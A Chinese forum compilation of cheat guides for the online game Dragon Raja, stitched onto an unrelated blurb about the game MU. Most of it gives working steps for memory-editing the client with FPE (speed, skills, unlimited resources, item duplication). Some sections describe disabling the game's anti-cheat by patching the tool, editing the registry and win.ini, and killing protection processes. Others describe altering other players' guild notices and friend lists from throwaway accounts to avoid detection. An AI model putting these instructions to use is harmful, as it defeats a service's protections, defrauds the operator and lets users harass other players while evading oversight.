奇迹游戏介绍:奇迹是由韩国Webzen公司创作的一款全新的网络在线游戏, 采用了优秀的3D引擎，绚丽的游戏画面和丰富的系统设定，能同时支持上万人同时在线。
奇迹创造了一组服务器可万人同时上线的梦想，在兼顾了美术、企划、以及技术等各方面的最佳表现之下，奇迹已被韩国官方评鉴为近乎完美、拥有无限发展空间的世界顶级网络游戏。
奇迹被韩国多家官方权威游戏机构评选为2001年最佳网络游戏，在2001年韩国游戏大展上被评选为最受欢迎的网络游戏。在中国运营后，奇迹也连续两年在多次权威游戏评比中获得最经典网络游戏以及最受欢迎网络游戏大奖。

10 27 88 27
10 27 9F 27
1F 27 DF 27

在输入ID的地方，选择制作小组，这样就可以切换出去，然后在龙族文件夹下的map文件夹中，找到
GM_event.map和GM_event.sou2这两个文件，把它先删到回收站，然后再找到Big_g.map和Big_g.sou2
这两个文件，把这两个文件复制，然后把复制后的"复件big_g.map"和“复件big_g.sou2”改名为
GM_event.map和GM_event.sou2，也就是把"复件Big_g"改为GM_event，然后切回龙族，输ID和密码，
进入后就可以不用等那烦人的15分钟而直接跑到蓝色竞技场[127 189]找银色骑士接任务杀怪获取边境
分和名声了。

[传承任务攻略]
在竞技场[120 68]根据老爷爷的提示：他的儿子分散在三个国家内。边境战模式下前往敌国第二层边
境找老骑士的三个儿子。拜所斯坐标（修多恩河209，270）杰彭坐标（卡拉尔村158,178）伊斯坐标
（塞多拉斯51,167）找其中哪一个儿子均可完成此任务。然后带着100万和2个玛脑与骑士的儿子对话
（此时就算己方国家输掉依然可以与其对话做任务）对话完毕后可以退出重新登入传送到竞技场再次
找到老爷爷，并带着一张公高山雪人皮和一张母高山雪人皮与之对话，对话完毕后按照提示等待15分
钟后自动被传送到蓝色竞技场，与神龙王面前的骑士对话，在30分钟内杀死10只绿色勃鲁怪，如果失
败将被传送出去，成功的话与骑士对话将会得到一亿龙币20点名声及5点边境名声的奖励再次点击其实
将会被传送回竞技场。
（完成任务后可以继续回去找老爷爷重接该任务）

竞技BT玩法:没有拿到参加竞技名额的可以瞬移进去杀人：坐标大概是70,90左右

天天边境14分的BUG。。
当边境一方国家快输的时候也就是石头剩10分的时候你估计差不多还要多久就爆了
你就狂换地图。直到输掉后你没有看见输掉时出现的那个盾牌为止。那么你就成功了
只要无看见输时那个爆裂的盾出现就说明成功了。这时你还可以去杀敌国的人。如果
都无杀人还狂过地图那么就算等边境过后你也就才得2分的边境分。加守护也才8分
这时你去接守护任务。依然可以接。接了后你就站那等时间吧。等了时间传送进去
就又可以领取10名誉6边境和1个复活了。前提是你边境的时候得杀些人哦。这样
一整套下来就会得14分边境分了。嘿嘿。。
斑竹觉的好的话就给偶加加分。晚上看有的朋友都不会这招那是瞒亏的。这样做
危险系数只有0。01%。希望大家天天晚上边境都可以拿满分。呵呵。。
也就是说在边境快输的时候你看你国家石头剩10分的时候就狂过地图。如果在
过地图的瞬间你国家战败了那么也就意味着会出先那爆裂的盾，只要你看见了那盾
那么你边境就输了就无分拿了。这大家都明白。但是在过地图的时候屏幕一黑的那
一瞬间输了你正好无看见那盾。那么你将还是在边境战争中的一个成员。也可以
去攻击敌国人。会不会加分我就不知道了。那么既然你还是边境战中的一名成员
那你就还可以去找那守护的披风男接任务。因为那人只认识穿战袍的人。呵呵。有
点SB吧那NPC。明白我的意思没？

搬柱子
进龙族-切换桌面-开FPE-切换龙族-*呼叫FPE-点"编辑"-查找-输入'人物名字'-一直查找到最后一个
记住这个地址然后重复以上步骤查找你想要搬的柱子的名字-找到后会看到柱子名字前面的第2个代码
(一般都是03)-把你的人物名字前面的第2个代码(一般都是01)改成03-把人物名字前面的第1个代码(也
就是01后面那个双字节代码)改成柱子名字前面的第一个代码(也就是03后面那个双字节代码)-然后再
把人物名字后面的第一个代码(就是名字后面隔了很多0000000000000000的第一个有数值的代码)改成
柱子名字后面的第一个代码(就是名字后面隔了很多0000000000000000的第一个有数值的代码，靶场的
是5E，其他的不记得了)-切换回龙族-最后你就会看到自己变成了柱子~背着柱子跑吧~跑到哪里柱子就
跟到哪里~选好位置后切换回FPE~猛按F3回复数值-切换回龙族~跑出你放柱子位置的画面再回来就行了！

附:早期搬柱子改法
首先向要搬的柱子作攻擊數次，
然後在 fpe 搜查柱子的名字，(和搜查自己的名字(晃動值)一樣)
然後把柱子名字的代碼抄下，柱子名字前8位的03要記住,名字前3,4位的也要記,
最後是名字下兩行的和(兩行的前1位也要記(若有))
然後再搜查自己的名字至最後一頁，(即修改晃動值一頁)
然後把自己的名字改作柱子的名字，
名字的前8位改03,前3,4 位就改之前所記住的柱子前3,4位，
名字的後33位改為60，32位改作柱子名字下兩行的前1位也要記(若有)
最後把人物移到你想把柱子搬到的位置，切換至 FPE，
把所有改過的東西回復至原來的，
回到遊戲中柱子並不會立即出來，
然後在遊戲中走遠一點，再走回你想搬柱子的位置，柱子就出現了。

盗提高攻击改法:
1：锁无限CP冰暴（不要自动锁定）
2：运无影，并使用。
3：用按键精灵脚本按FPE热键锁定。
4：攻击
这时你可以发现，射出了冰暴，攻击效果都是无影的效果。相当于只能打5下的无影现在能打25下了,
原来只是6000的攻击，现在能达到9000了，练功好爽啊。

一线冰改法:
让打出去的冰暴的每一镖，都不浪费的打在怪的身上。
其实有了考拉，已经很容易拉一线冰了。可是，如果不用跑动，而且每一次都成功，用FPE做一下以下
的修改就完美了：
1－－进龙族，让人物向正上方走几步，然后切换出FPE。
2－－找到技能地址，向上翻几行，然后就会看到几个数傎：04　00　00　00　04。
3－－把这两个位置锁定，再进龙族。现在打冰暴，向上，下方向打的，就是正常的。如果向左，右打，
就成一线冰了。

无限捐款:
FPE中输入05D00000按回车，查找FFFFFFFFH（注意是8个F，无单引号）查一次，查好后，它的直接上
一行锁1
FPE中输入05E00000按回车，查找'国家'，查一次，查好后，它的直接上3行锁1
锁完这2个地址就可以无限捐了

FPE自我解除屏蔽方法
首先,安装一个FPE
这是废话
然后安装好了的FPE2000或者2001都是直接就可以用的(个人认为2001基本是带毒的,所以我都用2000)
找到你的FPE安装目录,把FPE.exe这个文件复制一下
就放在当前目录把,不过要改个名字,简单起见就叫做111.exe
然后运行原来哪个FPE.exe打开以后,直接选编辑,打开文件,找到你的FPE安装目录
打开111.exe运行
看到编辑里面全是16位进制代码,麦关系,上面有个按钮叫做"查找"
点他然后输入'jaw' (注意了哦一定要左右带有'这个符号)
回车.找到一个地址,再键盘上输入3131315c313131
重复上面操作两次.就是说一共要修改3个地方(前面三个，后面的没用。)
找到你的FPE安装的目录,估计一般都是FPE2000这样的文件夹,把文件夹名字修改为1112000

第三阶段
打开注册表
进入[HKEY_LOCAL_MACHINE\Software
找到一个目录叫做jaw的,修改这个目录下面所有的带有jaw和FPE三个字母都修改为111
修改好了,你运行一下现在的111.exe
看看,是不是成功了啊!
这样就可以用FPE进去龙族玩啦~~~
图片讲解在论坛的:http://17dragon.com/BBS/dispbbs.asp?boardID=29&ID=36
解除屏蔽后，保留一个是未解除屏蔽的FPE，和一个解除屏蔽的FPE，然后开那个没解除屏蔽的FPE进
龙族，就会被T，让龙族T你几次，一般2~4次就可以了。然后会在系统文件的TEMP中隐藏生成的~*DR。TMP。
如果是删除不了。你就开已经解除屏蔽的FPE进龙族。按热键切换出来再看看编辑里面是不是已经有数据而不是？号了！
我找到那个Dr~。TMP文件了，但是每次被龙族T出来以后那个文件就自动消失了，晕。。。
fpe设成暂停游戏..

首先,正常进龙族.在填写帐号和密码的那一步点制作小组,就可以切出来了,打开WINDOWS文件夹,
找到WIN.INI记事本,打开他,删掉最后两行命令
C7431852=D:\WINDOWS\System32
A75AB9C3=D:\DOCUME~1\xx\LOCALS~1\Temp\Dra16.tmp
然后保存,把属性改为只读
退出龙族.再进,当你的任务进到城里后,你会发现可以用FPE了，不过你可能会发现你很卡,没关系,
切出来.打开任务管理器,杀掉DRA*.TMP（这个名字经常变，不过始终以ＤＲ开头的）进程.进龙族吧
进windows文件里的system32里的mcirlecd.dll和mcirleda.dll
剪切到别处试试~~进游戏切出来在剪~然后开FPE

总结一下高手FPE切出来是问号（转）
保留一个是未解除屏蔽的FPE，和一个解除屏蔽的FPE，然后开那个没解除屏蔽的FPE进龙族
（这个FPE把暂停游戏勾上），就会被T，让龙族T你几次，一般2~4次就可以了。然后会在系统文件
的TEMP中隐藏生成的~*DR。TMP。如果是删除不了。你就开已经解除屏蔽的FPE进龙族。按热键切换
出来再看看编辑里面是不是已经有数据而不是？（这个生成的文件在系统盘-我的文档-进你进系统
时的用户，2000一般是administrator--Local Settings--Temp，就在这个下面了，不过我发现这
几个文件能删，那也没关系，能删切出来也不是问号了）。

方法2：
1.$win\win.ini 里面删掉龙族相关部件.,保存..并改为只读属性..
2.重启电脑..(并非多余)
3.随便开个能用不能用的 fpe ,其他----暂停游戏勾起来
4.开龙族,到了输密码之类的后面按下fpe热键呼出fpe.
5.按 ctrl+alt+del 呼出任务管理器
6.找到任务管理器进程里面的dragonraja.bin终止它.
7.检查 $system32\mcir*.dll 是否可以删除,如果没有这两个文件,则重复4-7步.
8.如果第7步成功以后,关掉fpe.
9.打开解屏蔽好的fpe,保证 其他---暂停游戏勾去掉
10.开龙族,正常登陆进游戏,呼出fpe再看看效果..:)
PS:重启电脑以后,要重复3-10步

方法3：
也是最简单的方法，就在置顶的纠集风那个帖子里，最开始的2个步骤就是教你怎么解问号的
当然系统要2000
最后建议大家都装2000，方便的很，也很安全！
1、人物晃动值
答：人物晃动值是指你的角色在移动中或战斗攻击的时候，出现的比较贴进真实感的一种惯性，如果把这
个值锁定为1，那么在移动中或战斗中将可以提高人物的速度，相当于小加速。
如何查找人物晃动值，一般可以在调用的FPE中，选择编辑一栏，然后点选搜索，输入你所正在使用的角
色的名字，（注意：查找这种值要加单引号，而且这个单引号必须是英文状态下的，否则你找不到人物名
字的。比如你的角色叫玩吧，那么查找时要输入'玩吧'。一直查到最后一个名字为止。）
通常状态下，如果从地址00004000开始查起，那么将会查到十多个，当然是最后一个是有效的，经过长期
分析总结，有一个比较实用的小方法，一次性搜索就可以查到，也就是先把地址更改为0B000000并按回车键
使地址定位在0B000000这个地址，这时你只搜索一次，一般查到的就是最后一个人物名字地址。
查到最后一个名字后，请点向下的小箭头或向下的方向键5－6下，这时候你点更新，会发现在地址编辑栏
的最下面一行有一个不断跟着‘更新’变化跳动的数字，这就是人物晃动值，把它锁为01h就行了！（另外，
查找晃动值是有的人直接用热键呼出FPE后点更新就可以看到数值的变化，而有的需要先返回龙族一次，用
alt+tab切换出来点更新才能看到，这个根据个人的机器和系统情况而定的）晃动值也不都是锁01h的，拿
弓箭时锁01h，拿飞镖时就要锁02h了，否则是打不出飞镖的。

2、连射
答：连射地址在人物晃动值的前4位，锁定为08h就行了！示例如下：
（这是连击锁定值） 08 00 00 00 01（这是人物晃动值锁定值）
3、技能代码地址及等级
答：找到人物晃动值后，再用FPE查找'烫'，找到CC CC数值后停止，一般一次可以查到！这个时候你会
看到一个比较有标志性的魔法和战斗技能数值的地址代码：cc cc，将cc cc的左下角数字锁为你想要的
技能代码就可以了,在cc cc后面有一个数值是01,把01的正下方锁定数值为3（技能等级）就大功告成了！
示例如下：锁多重火E4H（锁技能代码要在数字后面加H）
00 00 CC CC 00 00 00 00 00 00 00 00 01 00 00 00
E4 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00
技能代码 技能等级

4、魔法、技能生效地址
答：在技能等级代码地址上数25行，为魔法、技能生效地址。如果你不知道你的技能代码或魔法代码，
你可以切回游戏，使用一次你想知道的魔法或技能，然后在技能代码未锁定的情况下点更新，看看技
能代码地址变更为多少，比如你用了鲨鱼飞弹，那么这时技能代码会变为F1，上数25你将会看到一个
数值为F1的，把它锁定为你想变更的就行了！

5、加速的查找
在FPE分析中
8位下查
76h,73h,8bh,4dh,fch
查到第一个基本上就是的了
然后把这个地址锁成ebh
再往下8行，再左数第4个和第5个
应该是55和F4
把55这个地址锁成d2h
把F4这个地址锁成90h

PS:窗口寻找办法
呼叫一个窗口需要2个地址，现在告诉你怎么搜索用FPE锁0的地址：
开启FPE后，就是有“返回游戏”的下面，搜索1，进龙族打开窗口（先不关闭），然后切出来搜索0，
然后进去把窗口关掉，出来搜索1，反复几次就可以找到1个地址，锁定0
现在是找窗口地址，正好和上面的数字相反，按此搜索就可以了

6、照明的查找
在FPE编辑中查'Light'
注意L是大写，其他小写
查找三次，就是第三个Light
然后往上2行
再向左数第9个地址
照明就是这个地址
锁1FH
你用查找的办法查\'play\'，点3下查找下一个，然后你在具体在这个地址中找，照明地址在中间，2边
是00 00 1F(照明地址) 00 00
照明找play 也不一定就是找三次，你找到05000000那个范围之后 然后自己观察，你可以照明地址一般
是 00 00 00 00 1F 00 00 00 00 两边都没有东西的一个地址

7、无限名声的查找
方法1：点捐款的老头打开捐款窗口时查找1，关闭时查找0，反复查找就可以找到3个地址，一般是把前
两个地址锁1。具体情况请个人试验。
方法2：FPE中输入05D00000按回车，查找FFFFFFFFH（注意是8个F，无单引号）查一次，查好后，它的直
接上一行锁1
FPE中输入05E00000按回车，查找'国家'，查一次，查好后，它的直接上3行锁1
锁完这2个地址就可以无限捐了
看清楚是05D和05E

8、无限看魂
烫第1个CC上49行后12个位置锁1为看魂，锁0为看不到魂[祭师挂幽灵技请锁0]
非祭师系还需在锁1的后2个位置锁数值为1000以上。

9、移动力
地址在晃动值的上8位，一般锁500到800之间，根据个人具体情况调节

10、热键写入
FPE默认的热键是小键盘的＋号键，如果不用热键写入的话，那么你锁定连射后人物将寸步难移，而且难以
自保，如果有人突然闯入你的练功区，你也不能及时隐蔽，呵呵。所以强烈推荐热键写入。方法很简单：
在查找各种数据前先把FPE表格中那个时钟下的“自动”前的对号去掉，再进行各种正常的地址查找、锁定
就行了。游戏中，如果想锁定数据时就按下热键，想加血或用别的魔法和技能时就松开热键。另外自定义
热键的话，别忘了点一下那个“更新热键”的按钮，否则更新无效。

名词解释

1、人物晃动值
答：人物晃动值是指你的角色在移动中或战斗攻击的时候，出现的比较贴进真实感的一种惯性，如果把这
个值锁定为1，那么在移动中或战斗中将可以提高人物的速度，相当于小加速。如何查找人物晃动值，一般可以在调用的FPE中，选择编辑一栏，然后点选搜索，输入你所正在使用的角色
的名字，（注意：查找这种值要加单引号，比如你的角色叫本拉登，那么查找时要输入'本拉登'。一直查
到最后一个名字为止。
通常状态下，如果从地址00004000开始查起，那么将会查到十多个，当然是最后一个是有效的，经过长期
分析总结，有一个比较实用的小方法，一次性搜索就可以查到，也就是先把地址更改为0B000000并按
回车键，使地址定位在0B000000这个地址，这时你只搜索一次，一般查到的就是最后一个人物名字地址。
查到最后一个名字后，请往下翻15行左右，这里你会看到一串
01 01 01 01 01 02 02 02 02 10 10 ……
这样的地址，这时候你点更新，会发现在这段地址的上一行有一个不断跟着‘更新’变化跳动的数字，
这就是人物晃动值，把它锁为1就行了！（注：如果你是用热键呼出来的FPE的话，你点更新将看不到任何
变化，请切换回龙族后，用Alt+Tab切换出来）

2、冰箭地址
答：冰箭地址在人物晃动值的前四位，锁值为2后(从01h~0Fh是不同的攻击值，棍术的连击也有，但是具
体如何让其打出实际攻击，正在研究中)，打出来的就是冰箭了（但必须你的神圣力量或法术力量值被锁
定，要不你射不了几下就要……），如果不清楚我写下面这个示例：
（这是冰暴锁定值）02 00 00 00 01（这是人物晃动值锁定值）

3、连击
答：连击地址在人物晃动值的前8位，锁定为08h就行了(从01h~0Fh是不同的攻击值，棍术的连击也有，但
是具体如何让其打出实际攻击，正在研究中)！示例如下：
（这是连击锁定值）08 00 00 00 02 00 00 00 01（这是人物晃动值锁定值）

4、魔法能量
答：不管圣系法系，锁能量都是一样的，先查找当前能量值，比如你现在的法术能量为500，切出去查找
500，然后进龙族放一个法术，当看到法术能量值减少时，立即记住这个数据，用热键呼出FPE，查找当前值。
一般只找到一条或两条地址，如有两条地址，随便锁哪一个都行。锁定值建议在1000~10000。
纯弓、纯盗、纯战士的魔法值如果也想锁定的话，建议先搜捕第一次值，一般为53，然后锁一次冰箭地址，然
后进龙族放一箭，数值会变为13，呼出FPE，查找出来后锁定就行了！

5、技能代码地址及等级（此为快速方式，感谢晶晶建议）
答：找到人物晃动值后，再用FPE查找‘烫’，找到CC CC数值后停止，一般一次可以查到！这个时候你会看到
一个比较有标志性的魔法和战斗技能数值的地址代码：cc cc，将cc cc的左下角数字锁为你想要的技能代码就
可以了,在cc cc后面有一个数值是01,把01的正下方锁定数值为3（技能等级）就大功告成了！示例如下：（锁
技能代码要在数字后面加H）
00 00 CC CC 00 00 00 00 00 00 00 00 01 00 00 00
E4 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00
技能代码 技能等级

6、魔法、技能生效地址
答：在技能代码地址上数22行，为魔法、技能生效地址。如果你不知道你的技能代码或魔法代码，你可以切回
游戏，使用一次你想知道的魔法或技能，然后在技能代码未锁定的情况下点更新，看看技能代码地址变更为多少，
比如你用了沙鱼飞弹，那么这时技能代码会变为F1，上数22你将会看到一个数值为F1的，把它锁定为你想变更的就行了！
【如何能让24个专职任务。大部分接文件的 BUG。大家请尝试下】
当你交了边境的时候
晚上10点左右。把按键精灵 设定成想割10秒的。10秒点1次。
试下这个方法。应该可以成功。我用这个按键精灵 设定10秒的
1天交了6个文件。
大家如果感兴趣可以去试1次看看。

国籍,公会公告修改:
把自己改成穿GM的圣诞老人衣服:名字前10位锁为1
1 DRGM地址 左数10位
2 国籍地址 左数12位03H BSS;04H,JP;05H,HAIGE;06H,YS;
3 公会地址 左数16位
路服:
闲云02H蛮坏，小鱼儿07h,恶人谷0Ah夜朗14h自由之翼1Ah鬼武22h (16进制)
五色领主50龙炎58(10进制)

DRGM地址在番茄外挂中叫做看GM鬼魂，一般来说锁1，如果可以看到灵魂，那把DRGM地址锁1，就可以
看到DRGM鬼魂

国籍地址，按BSS、JP、海格、YS排列，改成其他国籍可以加其他国家的人进好友名单，包括加DRGM
公会地址嘛，改成其他公会，你进游戏后，就会发现自己公会的会标变成其他公会的会标了，这时，
去公会NPC那里，可以看到其他公会的仓库，可以看到其他公会的人员
把国籍地址改成08，再把公会地址改成其他公会，然后点公会NPC，可以乱改其他公会的公会公告，
如果再去蓝色竞技场，就可以乱指定其他公会的副会长
这里要说的是：比如我名字叫黑墨鲤1号，我的公会代码是2A.01,其他玩家比如黑墨鲤2号的公会代码
是多少呢，这里就必须先查到他的公会代码，同理，他的公会代码也在他名字的前16位，比如是3A.02，
现在你把自己的2A.01改成3A.02，再把国籍地址锁08，然后就可以去作弄黑墨鲤2号的公会了

如果你们担心会被查到，那就用1级的小号在新手村改，改完删除小号
提供2个地址
005DF614 锁0
05E9C61C 锁1
在FPE中不要打钩，按快截键就可以跳出窗口，这个窗口和蓝色竞技场点老头跳出来的窗口是一样的，
这样就不必练到11级再去蓝色竞技了，同理，你也可以用这2个地址在任何地方做公会申请之类的事情

说到用FPE查最后一个人名，这个大家都知道吧，比如你叫333，查最后一个333，
用FPE把这个333乱改改，改成其他玩家的名字，比如改成444，再按F，出来的好友名单，就是444的好友
名单，然后嘛，随你删除添加
这样你就可以乱改自己仇人的好友名单了，用1级的小号改，在新手村就可以完成，然后再删掉这个小号，
这样官方完全查不出来
估计会有人问，怎么才能改成自己想要的名字
教你一招，你先查你自己最后一个名字
然后查CCCCH，再向上翻四页
然后你回到游戏中打出你要改的名字，注意是要按回车打出来的
然后再回FPE，点更新，就会看到你刚才说的话，再用笔记下来
再回自己名字那里改掉就行了

法师多火挂盾
看着有这么多人不会用,老解释也不是办法,我写一个把
呵呵,别说我侵犯版权咯

法师多火挂盾需要修改两个地方
1)弓箭连射
进龙族然后切换出来,在fpe的编辑中用"寻找",寻找数值为你的人物名字，比如我的人物叫阿波，则寻找'阿波'
（注意必须使用单引号）
找到后，看看有一组数据0101010202020303,把第一个01上面那个数值锁定为1

2）法师用多火
法师聚气治病，切换出来搜索05h
转换为和平状态，搜索00h
这样会找到一个唯一的地址,把这个地址锁定为e4h(去掉自动锁定，我这样做的目的是为了自己加武器加持）
到此修改完成

使用
进龙族，给自己加3
按小键盘+（将e4多火写入内存）
对着战绩柱用弓箭射吧，然后把飞镖和盾换上（如果e4没作用，就换e5)

我这样做的好处有
1、弓箭连射的速度比飞镖快，所以先用弓箭来带出效果再换飞标
2、自己可以加3挂起来快些

现在龙族的魔法数据
根据我修改的经验，它的数据由三部分组成

1、数据部分 所有魔法用得到的数据都排在一起，没有什么规律，也没有什么特定的代码，总之很乱，我也看
不懂，呵呵
2、地址部分 这大概是韩国工程师经过无数次的教训后弄出来的新东西。每种魔法存在好多地址，每用一个
魔法，他都要到不同的地址去读数。应该说这是魔法的控制部分。
3、动态变量 每用一次魔法，这个地址的数据都会变

因此现在有三种改法
1、修改魔法数据（因为这个没有规律，我也没功夫去一个一个查找，不过这个应该是最有效、最简单的）
2、修改魔法控制的地址转向
3、修改变量啦

现在我们就来看看动态变量的查找和修改

查找
工具：fpe
人物：fs
方法：
1、在龙族中聚气“解毒”，切换出来，查找04
2、回龙族聚气“火球”，切换出来，查找30
这样你会找到10个地址。
（注：04是解毒的初始环节,也就是为什么要聚气的原因。30=1e,1e是火球的初始环节，9c是第二环节，99是
第三环节）

修改
现在我们修改的重点放在第10个地址，选择第10个使用表格，锁定值80，把自动锁定取消，然后确定。
回龙族，聚气火焰放射，在点鼠标右键的同时，按下小键盘＋，你会发现，火焰放射出去后攻击力变成了火鸟。
其他的自己慢慢改吧。

从龙族的魔法代码和魔法的实际应用中我们都应该知道龙族的魔法施放过程一般包括2-3个阶段，
聚气—施放—生效。

火球循环
火球的代码1E-9C-99，1E(聚气）—9C(施放）—99（生效），火球循环就是把99改为9C,这样一来就成了1E-9C-9C,
火球就会不停的发射，实现了循环。

弓箭循环
由于我们没有找到弓箭的其他环节，因此弓箭只能*火球魔法来把他带入循环了。
弓箭C3,要实现循环首先要把弓箭改为火球，即把C3改为1E,这样射箭后发出去的就是火球。
然后99改9C实现火球循环，这样就用火球将弓箭带入了循环。

全屏火鸟
全屏火鸟其实就是启示录的攻击方式，火鸟的攻击力。
24-9E-B6 启示录
98-99 火鸟
99改为9E，这样放火鸟出去后就以启示录的方式向四周发射。
实际的效果测试全屏火鸟的范围比启示录大得多，有3个屏幕那么大，这是因为火鸟本来就飞得远。

全屏弓盗技能
弓或者飞镖+启示录

地图替换法:
Big_g.map大草原地图文件
VENOM3.map毒3地图文件
进了毒3后，把我说的上面2个文件互相复制了后替换一下就可以了，就是把草原地图文件名字改成
毒3的，毒3的改成草原的就OK了

如何查找自己想要的魔法代码？
答：这里公布最低级的两个魔法代码
（这里我写的是16进制值，他们的对比表简单如下：
十六进制：0,1,2,3,4,5,6,7,8,9,0A,0B,0C,0D,0E,0F,10,11依此内推……
十进位制：0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17依此内推……）
祭师系法术[治疗圣言]97h
法师系法术[治疗疾病]05h
弓箭系战技[多重火]e4h
盗贼系战技[冰暴]efh
一般来说,魔法代码和战技代码都是按顺序排列的组合，我们看下面这组祭师系法术代码：
97h 治疗圣言
98h 排除危险
99h 祝福术
这表示他的法术代码是按顺序、有规律地排放的！也就是说，你现在可以用祭师打开帮助看看
法术那一页，就可以知道祭师系所以法术的代码了：）
再看下面这组弓盗战技的法术：
e4h 多重火
↓后移4个数字（位置）
e8h 究极之火
↓后移7个数字（位置）
efh 冰暴
↓后移2个数字（位置）
f1h 沙鱼飞弹
↓后移3个数字（位置）
f4h 究极之冰
大家可以打开战斗技能学习的页面看看，中间的差值是不是刚好与学习战斗技能的排列值相
吻合，现在，你应该可以清楚地知道其他的比如战士的战斗技能代码是多少了吧？
注：法师系魔法代码不能按此查找。因为官方对法师系魔法的改动很大，经常变动！如何确
定你想要的法师系魔法呢？首先用基本代码找到该地址“（第7答），然后更换魔法，用热键
呼出FPE，在编辑中点更新，看看代码变成了什么就知道了！这也是最准确的办法！

3、如何查找人物晃动值
答：人物晃动值是指你的角色在移动中或战斗攻击的时候，出现的比较贴进真实感的一种惯性，
如果把这个值锁定为1，那么在移动中或战斗中将可以提高人物的速度，相当于小加速。
如何查找人物晃动值，一般可以在调用的FPE中，选择编辑一栏，然后点选搜索，输入你所正在
使用的角色的名字，（注意：查找这种值要加单引号，比如你的角色叫本拉登，那么查找时要
输入'本拉登'。一直查到最后一个名字为止。
通常状态下，如果从地址00004000开始查起，那么将会查到十多个，当然是最后一个是有效的，
经过长期分析总结，有一个比较实用的小方法，一次性搜索就可以查到，也就是先把地址更改为
0B000000并按回车键，使地址定位在0B000000这个地址，这时你只搜索一次，一般查到的就是最
后一个人物名字地址。
查到最后一个名字后，请往下翻15行左右，这里你会看到一串
01 01 01 01 01 02 02 02 02 10 10 ……
这样的地址，这时候你点更新，会发现在这段地址的上一行有一个不断跟着‘更新’变化跳动的
数字，这就是人物晃动值，把它锁为1就行了！（注：如果你是用热键呼出来的FPE的话，你点更
新将看不到任何变化，请切换回龙族后，用Alt+Tab切换出来）

4、如何查找简单冰箭地址？
答：冰箭地址在人物晃动值的前四位，锁值为2后(从01h~0Fh是不同的攻击值，棍术的连击也有，
但是具体如何让其打出实际攻击，正在研究中)，打出来的就是冰箭了（但必须你的神圣力量或法
术力量值被锁定，要不你射不了几下就要……），如果不清楚我写下面这个示例：
（这是冰暴锁定值）02 00 00 00 01（这是人物晃动值锁定值）

5、如何锁定魔法能量？
答：不管圣系法系，锁能量都是一样的，先查找当前能量值，比如你现在的法术能量为500，切出去
查找500，然后进龙族放一个法术，当看到法术能量值减少时，立即记住这个数据，用热键呼出FPE，
查找当前值。一般只找到一条或两条地址，如有两条地址，随便锁哪一个都行。锁定值建议在1000~5000。
纯弓、纯盗、纯战士的魔法值如果也想锁定的话，建议先搜捕第一次值，一般为53，然后锁一次冰
箭地址（详情请参照第4个答题），然后进龙族放一箭，数值会变为13，呼出FPE，查找出来后锁定
就行了！

6、如何实现连击？
答：连击地址在人物晃动值的前8位，锁定为08h就行了(从01h~0Fh是不同的攻击值，棍术的连击也有，
但是具体如何让其打出实际攻击，正在研究中)！示例如下：
（这是连击锁定值）08 00 00 00 02 00 00 00 01（这是人物晃动值锁定值）

7、如何变更攻击方法？
答：这里谈一种比较常用而且也是玩吧里最热的话题，也就是怎么样实现任何职业用无限多重火技能
（本人建议用究极火，因为多重才5弹，究极8弹），首先，在龙族中使用魔法或技能，这里我们用祭
师来做示例（因为本人是祭师：），使用治疗圣言（97h），集气，先不施放出去，这时用热键呼出FPE，
查找97h（十六进制）或151（十进制），返回游戏，将角色切换为和平状态，然后切换出FPE，查找0，
一般找到一个地址，有些人会找到几个地址，通常这个地址以0B开头，如果你不是拿得很准的话，建
议找到多地址的朋友再进龙族用一回治疗圣言，然后再用热键呼出FPE查找97h或151,这样就只能剩下
一个地址了。
点‘编辑’，然后在编辑里点数值，将它锁定为e4h，然后再进入编辑中，往下翻20行左右，这个时候
你会看到一个比较有标志性的魔法和战斗技能数值的地址代码：cc cc
将cc cc的左下角数字锁为e4h,在cc cc后面有一个数值是01,把01的正下方锁定数值为3就大功告成了！
示例如下：
00 00 CC CC 00 00 00 00 00 00 00 00 01 00 00 00
E4 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00

8、如何将使用出去的魔法效果转变（比如转变成经验或火鸟攻击）？
将搜索出来的第一个数值（详情请看第7答题）改为你想要的就行了，以后不管你用什么魔法或战斗技
能，出去的效果都将变成你想要的。
比如我改为ADh（治疗视力）,然后开了PK，满大街朝着人就射，经验嘛，呵呵，当然是加的咯，还增
加祈祷哦：）
注意：如果你改为你还没学习到的法术或技能的话，将不显示效果或出现“某某法术不能发挥效果”
这样的提示。至于怎么将没学过的法术或技能让他显示出威力，正在研究中，也希望会的朋友们把
方法公布出来。
进入游戏，打开FPE，修改以下几项：

1、移动力的修改（晃动值上数8位，网速不好且机器可参考锁定450~550之间,要是玩龙族流畅的话,可参考
锁定600~900之间）具体锁的值中，大家可以根据自己机子的适应能力来试验锁哪个成功率最高！
2、把晃动前4锁12，晃动直接锁12（不带h,也就是10进制,或者锁定0CH,163进制）12 00 00 00 晃[晃也锁
12]
3、打开外挂，打开照明和加速！(没有加速复制要慢N多),或者可以自己修改照明和加速,具体方法,可参考
修改篇
PS：我的成功率为10秒~50秒成功一次，基本上不会大于1分钟！最主要的关键性因素还是取决于第1和第2
项，具体自己的机子适合锁多少，大家可以摸索，但我给出的这个值是取中间的标准值，任何机型适用~`
最主要的是你找个地方，不另什么地方都可以复制的，有来回跑的地方就OK啦。
跑的时候记得，跑过去一个地图，就先按一下技能，看能不能使
用技能。然后再跑等屏幕刚黑的时候按技能，这样成功率高。还有就是这样的，还有一般出现两行黄字，
比喻往哪里哪里传送，那就是你快成功啦。

固定标志：
1、无法使用魔法或战斗技能，不会出现“准备某某魔法或技能”的提示！
2、脱下人物身上的衣服，而自己电脑上看到的人物的衣服却还是穿着的！
3、人物要是在HP不满的状态下，吃血瓶但血并不补满
4、人物就像掉了线，但打开好友名单能看到好友名字及在线与否情况！
5、你朋友从好友名单里看到你是红色的,也就是看到你掉线了,然而你就在他面前
直接把中央或者是堡垒 或者其他竞技地图改成火1火2的地图文件就可以大大提高成功率
地图名请参考代码篇
复制最关键的是
1:移动力要适合你的机器和网速
2:站位
3:鼠标点传送门的哪个位置
希望大家自己好好琢磨,相信每个人都能找到适合自己的复制办法,别人复制迅速的方法不一定适合你

另类复制办法:

1.先看看你物品框里有些什么,找个简单的,比如随便的一根颤抖,记住名称.
2.激活FPE,在"编辑"中搜索'龙魂"或者"水晶戒指"或者其他什么极品,会发现一连串的连续地址,在右边的
ASCII符号框中会有中文的"龙魂"几个字(不要用<龙魂使之戒>等较长的中方字
